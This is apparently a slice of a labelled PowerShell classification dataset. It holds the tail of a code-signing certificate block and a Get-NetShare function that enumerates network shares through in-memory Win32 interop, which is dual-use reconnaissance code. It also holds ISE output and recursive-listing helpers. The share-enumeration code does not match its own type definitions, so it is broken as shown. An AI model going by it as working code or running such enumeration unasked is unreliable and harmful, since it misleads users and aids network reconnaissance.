ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIOCCU/GKU4qbyL7IswFmiLuH # Y/OCQs65gg8YhBSeShQFMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAPoLm5RuDdzTlurnp3G6FDgJQjGH1EzdcVM6jgVtMhkDMoEZDtJTPaXPf # wLie78mnnzTswwslpIdWRZdYae8JgoRv8/gDXkU6w3Dv1xjoEqFRm+xjU03XLMSB # Q9CgZi76+FRwglIukSPnMLHIBy16+uMTpOhrGujVr2VzOnd6Yhhv1osY2MW0Uo+2 # /khaLx/p8SgrKjDzkVxSDo7A4L8J5dIwzTVBp8wg7WdiFp75FlvM9HQI9GONNLzf # iwmHioHbSWm53XRXIiNizwiRGMwnk2htwUPYXB1qhnXlCE5p76yMLjeXG8qs9mz8 # RjLFnSAA+hDzC8z8cjaIJBaOFKsnyqGCFykwghclBgorBgEEAYI3AwMBMYIXFTCC # FxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq # hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCDp6Poj4YXsB+7ZVu0/KnK+iSRQgdCbIRZD9wJRqW5xcgIGZh/+xUOY # GBMyMDI0MDQyMzEzMTYxMy40NzdaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO # Ojg2REYtNEJCQy05MzM1MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT # ZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHdXVcdldStqhsAAQAAAd0wDQYJ # KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx # MDEyMTkwNzA5WhcNMjUwMTEwMTkwNzA5WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl # cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjo4NkRGLTRC # QkMtOTMzNTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKhOA5RE6i53nHURH4lnfKLp # +9JvipuTtctairCxMUSrPSy5CWK2DtriQP+T52HXbN2g7AktQ1pQZbTDGFzK6d03 # vYYNrCPuJK+PRsP2FPVDjBXy5mrLRFzIHHLaiAaobE5vFJuoxZ0ZWdKMCs8acjhH # UmfaY+79/CR7uN+B4+xjJqwvdpU/mp0mAq3earyH+AKmv6lkrQN8zgrcbCgHwsqv # vqT6lEFqYpi7uKn7MAYbSeLe0pMdatV5EW6NVnXMYOTRKuGPfyfBKdShualLo88k # G7qa2mbA5l77+X06JAesMkoyYr4/9CgDFjHUpcHSODujlFBKMi168zRdLerdpW0b # BX9EDux2zBMMaEK8NyxawCEuAq7++7ktFAbl3hUKtuzYC1FUZuUl2Bq6U17S4CKs # qR3itLT9qNcb2pAJ4jrIDdll5Tgoqef5gpv+YcvBM834bXFNwytd3ujDD24P9Dd8 # xfVJvumjsBQQkK5T/qy3HrQJ8ud1nHSvtFVi5Sa/ubGuYEpS8gF6GDWN5/KbveFk # dsoTVIPo8pkWhjPs0Q7nA5+uBxQB4zljEjKz5WW7BA4wpmFm24fhBmRjV4Nbp+n7 # 8cgAjvDSfTlA6DYBcv2kx1JH2dIhaRnSeOXePT6hMF0Il598LMu0rw35ViUWcAQk # UNUTxRnqGFxz5w+ZusMDAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQUbqL1toyPUdpF # yyHSDKWj0I4lw/EwHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD # VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j # cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG # CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw # MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD # CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBAC5U2bINLgXIHWbM # cqVuf9jkUT/K8zyLBvu5h8JrqYR2z/eaO2yo1Ooc9Shyvxbe9GZDu7kkUzxSyJ1I # ZksZZw6FDq6yZNT3PEjAEnREpRBL8S+mbXg+O4VLS0LSmb8XIZiLsaqZ0fDEcv3H # eA+/y/qKnCQWkXghpaEMwGMQzRkhGwcGdXr1zGpQ7HTxvfu57xFxZX1MkKnWFENJ # 6urd+4teUgXj0ngIOx//l3XMK3Ht8T2+zvGJNAF+5/5qBk7nr079zICbFXvxtidN # N5eoXdW+9rAIkS+UGD19AZdBrtt6dZ+OdAquBiDkYQ5kVfUMKS31yHQOGgmFxuCO # zTpWHalrqpdIllsy8KNsj5U9sONiWAd9PNlyEHHbQZDmi9/BNlOYyTt0YehLbDov # mZUNazk79Od/A917mqCdTqrExwBGUPbMP+/vdYUqaJspupBnUtjOf/76DAhVy8e/ # e6zR98PkplmliO2brL3Q3rD6+ZCVdrGM9Rm6hUDBBkvYh+YjmGdcQ5HB6WT9Rec8 # +qDHmbhLhX4Zdaard5/OXeLbgx2f7L4QQQj3KgqjqDOWInVhNE1gYtTWLHe4882d # /k7Lui0K1g8EZrKD7maOrsJLKPKlegceJ9FCqY1sDUKUhRa0EHUW+ZkKLlohKrS7 # FwjdrINWkPBgbQznCjdE2m47QjTbMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ # mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh # dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1 # WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB # BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK # NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg # fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp # rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d # vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9 # 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR # Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu # qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO # ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb # oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6 # bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t # AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW # BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb # UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz # aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku # aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA # QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2 # VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu # bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw # LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93 # d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt # MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q # XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6 # U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt # I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis # 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp # kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0 # sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e # W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ # sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7 # Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0 # dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ # tB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh # bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjo4 # NkRGLTRCQkMtOTMzNTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy # dmljZaIjCgEBMAcGBSsOAwIaAxUANiNHGWXbNaDPxnyiDbEOciSjFhCggYMwgYCk # fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF # AOnRvQQwIhgPMjAyNDA0MjMxMjUyMjBaGA8yMDI0MDQyNDEyNTIyMFowdDA6Bgor # BgEEAYRZCgQBMSwwKjAKAgUA6dG9BAIBADAHAgEAAgIH/zAHAgEAAgISKDAKAgUA # 6dMOhAIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAID # B6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBAEtAJf9QQUkfnjakWpA/ # WTJ4s59d1ydd1YCu0doiQ7zKrtg+fPXaO+UnceDABE97pgPadQ3qu9K0ikm1c/cM # Waf6FyR3t7zee3PwsEGTk2CPIUwLCYrMasurESYCykjmcyo5aeimsVVRSCr36tnZ # YZLeD4pEzDs6hAxbbMfDl26nMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt # U3RhbXAgUENBIDIwMTACEzMAAAHdXVcdldStqhsAAQAAAd0wDQYJYIZIAWUDBAIB # BQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx # IgQgxpYDwN0423qB1oINBZadRkpo1zWH9pbpyCVYwhU4K5QwgfoGCyqGSIb3DQEJ # EAIvMYHqMIHnMIHkMIG9BCBh/w4tmmWsT3iZnHtH0Vk37UCN02lRxY+RiON6wDFj # ZjCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # JjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB3V1X # HZXUraobAAEAAAHdMCIEIOmVHNIZrArpRiTxre+ot/ScGrSRpjA9BFR2kZJAoOaA # MA0GCSqGSIb3DQEBCwUABIICAApVpUeN8Azk7DquJjJMZoIa11Y6/xwNx2DzseQG # D5irmUW8VaiuuuRBcAfd5UL2JMopwj3PfAMTIyhmThoFajcTMBuW07ucmW0psU9b # Il4bq9Q2T6njrv/uGAfzrMHZdZ7xppVJmS1H4VRgRT4WSMCe7hxkhpH/ht8JLZsR # B+gGnY6bjfcyYbqhSFjg3urgipG2Ot9pWoIJAfZLDAeGldIS15P/aX5esm2SITen # vVC2DRfg8jG14bGmnwS1ENFzmv0YPghngILBqBVY6t+aca4wc87eWBXBLRGQ16mQ # cZcUSwmlJIkaJlyAnYirgVKUB0HXmsJq24ek5uyncT4L+Ws7hHpctj2F7m8trEOn # QG2U8A487YNt7fiQacrQ6ANpPVleK9cBISnMK9lEcaAxp1tNqY3oX7YKigJ3xg82 # ESGcRqulis3/dy04HyAK/0yXhcKxrR5hQUTcAc08t+M92l0C3br75h0ZD3z8mcEf # mHu03ysFhkuDzYnh2w4uq3sFwGBJUUVj+tUm7V5se8W6C+8hmjxC/T7Zh/1ZapbO # p4ljjiHSqv+W6jvgECmIAecClHCHrnbreKbn4I9wNQRxrv4nBYKuIPSl1x0vKCm+ # j5YrpI9oqz40gVjLst9cuyX6R6xWSZowe575FdBflNiIn+tIMGdNxI1Jv7ts7wAT # szHo # SIG # End signature block
combined_dataset/train/non-malicious/2704.ps1
2704.ps1
function Get-NetShare { [CmdletBinding()] param( [string] $HostName = 'localhost' ) If ($PSBoundParameters['Debug']) { $DebugPreference = 'Continue' } $QueryLevel = 1 $ptrInfo = [IntPtr]::Zero $EntriesRead = 0 $TotalRead = 0 $ResumeHandle = 0 $Result = $Netapi32::NetShareEnum($HostName, $QueryLevel,[ref]$ptrInfo,-1,[ref]$EntriesRead,[ref]$TotalRead,[ref]$ResumeHandle) $offset = $ptrInfo.ToInt64() Write-Debug "Get-NetShare result: $Result" if (($Result -eq 0) -and ($offset -gt 0)) { $Increment = $SHARE_INFO_1::GetSize() for ($i = 0; ($i -lt $EntriesRead); $i++){ $newintptr = New-Object system.Intptr -ArgumentList $offset $Info = $newintptr -as $SHARE_INFO_1 $Info | Select-Object * $offset = $newintptr.ToInt64() $offset += $increment } $Netapi32::NetApiBufferFree($ptrInfo) | Out-Null } else { switch ($Result) { (5) {Write-Debug 'The user does not have access to the requested information.'} (124) {Write-Debug 'The value specified for the level parameter is not valid.'} (87) {Write-Debug 'The specified parameter is not valid.'} (234) {Write-Debug 'More entries are available. Specify a large enough buffer to receive all entries.'} (8) {Write-Debug 'Insufficient memory is available.'} (2312) {Write-Debug 'A session does not exist with the computer name.'} (2351) {Write-Debug 'The computer name is not valid.'} (2221) {Write-Debug 'Username not found.'} (53) {Write-Debug 'Hostname could not be found'} } } } $Mod = New-InMemoryModule -ModuleName Win32 $FunctionDefinitions = @( (func netapi32 NetSessionEnum ([Int]) @([string], [string], [string], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), (func netapi32 NetApiBufferFree ([Int]) @([IntPtr])) ) $SESSION_INFO_10 = struct $Mod SESSION_INFO_10 @{ sesi10_cname = field 0 String -MarshalAs @('LPWStr') sesi10_username = field 1 String -MarshalAs @('LPWStr') sesi10_time = field 2 UInt32 sesi10_idle_time = field 3 UInt32 } $Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Win32' $Netapi32 = $Types['netapi32']
combined_dataset/train/non-malicious/Out-IseFile.ps1
Out-IseFile.ps1
function Out-IseFile { [CmdletBinding()] param ( [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True) ] $msg, [Parameter(Position = 1, Mandatory = $False, ValueFromPipeline = $False)] $path = $null, [Parameter(Position = 2, Mandatory = $False, ValueFromPipeline = $False)] $width = 2000, [switch]$fl, [switch]$passEditor ) Begin { $cnt = 0 $count = $psise.CurrentPowerShellTab.Files.count $null = $psIse.CurrentPowerShellTab.Files.Add() $Newfile = $psIse.CurrentPowerShellTab.Files[$count] if ($path) { $NewFile.SaveAs($path) $NewFile.Save([Text.Encoding]::default) } $Editor = $Newfile.Editor filter Remove-TrailingBlanks { $_ -replace '(?m)\\s*$', '' } #filter Remove-TrailingBlanks { $_.TrimEnd() } } Process { $cnt++ # if ($msg) { $msg | gm | Write-Verbose } if ($cnt -eq 1) { $cmsg = @($msg) } else { $cmsg = $cmsg + @($msg) } } End { if ($cnt -gt 1) { $msg = $cmsg } if ($fl) { $msg = $msg | Format-list | out-string -width $width | Remove-trailingBlanks } else { $msg = $msg | out-string -width $width | Remove-trailingBlanks } $msg = $msg + "`r`n" #$Editor.SetCaretPosition($Editor.LineCount, 1) $Editor.InsertText($msg) if ($passEditor){ $Newfile } Write-Verbose "Anzahl = $cnt len msg = $($msg.count)" } } <# $profile.psextended | out-IseFile -fl -verb get-help * | out-string -width 2000| out-ISEFile -verb get-help * | out-ISEFile -verb get-help * | out-ISEFile $a = $profile.psextended out-IseFile $a -fl $a = get-help * | out-string -width 2000 out-IseFile $a #>
combined_dataset/train/non-malicious/Get-ChildItemRecurse.ps1
Get-ChildItemRecurse.ps1
function Get-ChildItemRecurse { <# .Synopsis Does a recursive search through a PSDrive up to n levels. .Description Does a recursive directory search, allowing the user to specify the number of levels to search. .Parameter path The starting path. .Parameter fileglob (optional) the search string for matching files .Parameter levels The numer of levels to recurse. .Example # Get up to three levels of files PS> Get-ChildItemRecurse *.* -levels 3 .Notes NAME: Get-ChildItemRecurse AUTHOR: tojo2000 #Requires -Version 2.0 #> Param([Parameter(Mandatory = $true, ValueFromPipeLine = $false, Position = 0)] [string]$path = '.', [Parameter(Mandatory = $false, Position = 1, ValueFromPipeLine = $false)] [string]$fileglob = '*.*', [Parameter(Mandatory = $false, Position = 2, ValueFromPipeLine = $false)] [int]$levels = 0) if 